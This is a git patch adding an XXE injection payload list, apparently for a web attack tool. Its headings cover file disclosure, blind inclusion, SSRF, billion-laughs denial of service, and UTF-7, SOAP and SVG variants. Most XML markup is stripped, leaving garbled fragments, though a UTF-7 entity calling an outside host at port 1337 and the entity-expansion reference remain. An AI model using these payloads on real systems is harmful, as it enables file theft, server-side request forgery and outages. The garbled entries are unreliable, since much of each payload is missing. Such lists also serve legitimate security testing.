From 3f3b7feed22a3d79c4f33cb73a2fadebb7846433 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=C4=B0smail=20Ta=C5=9Fdelen?= Date: Sat, 23 Nov 2019 11:02:34 +0300 Subject: [PATCH] add intruder - xxe-injection-payload-list.txt add intruder - xxe-injection-payload-list.txt --- Intruder/xxe-injection-payload-list.txt.txt | 127 ++++++++++++++++++++ 1 file changed, 127 insertions(+) create mode 100644 Intruder/xxe-injection-payload-list.txt.txt diff --git a/Intruder/xxe-injection-payload-list.txt.txt b/Intruder/xxe-injection-payload-list.txt.txt new file mode 100644 index 0000000..032ee07 --- /dev/null +++ b/Intruder/xxe-injection-payload-list.txt.txt @@ -0,0 +1,127 @@ +# XML External Entity (XXE) Injection Payloads + +* XXE : Classic XXE + + + + +]> +&file; + + + + ]>&xxe; + + + + ]>&xxe; + + + + ]>&xxe; + +* XXE: Basic XML Example + + + + John + Doe + + +* XXE: Entity Example + + + ]> + + John + &example; + + +* XXE: File Disclosure + + + ]> + + John + &ent; + + +* XXE: Denial-of-Service Example + + + + + + + + + + + +&lol9; + +* XXE: Local File Inclusion Example + + + +]>&xxe; + +* XXE: Blind Local File Inclusion Example (When first case doesn't return anything.) + + + + +]>&blind; + +* XXE: Access Control Bypass (Loading Restricted Resources - PHP example) + + +]> + + +* XXE:SSRF ( Server Side Request Forgery ) Example + + + +]>&xxe; + +* XXE: (Remote Attack - Through External Xml Inclusion) Exmaple + + +]> +3..2..1...&test + +* XXE: UTF-7 Exmaple + + ++ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4 ++ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+ ++ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4 + +* XXE: Base64 Encoded + + %init; ]> + +* XXE: XXE inside SOAP Example + + + + %dtd;]>]]> + + + +* XXE: XXE inside SVG + + + + \ No newline at end of file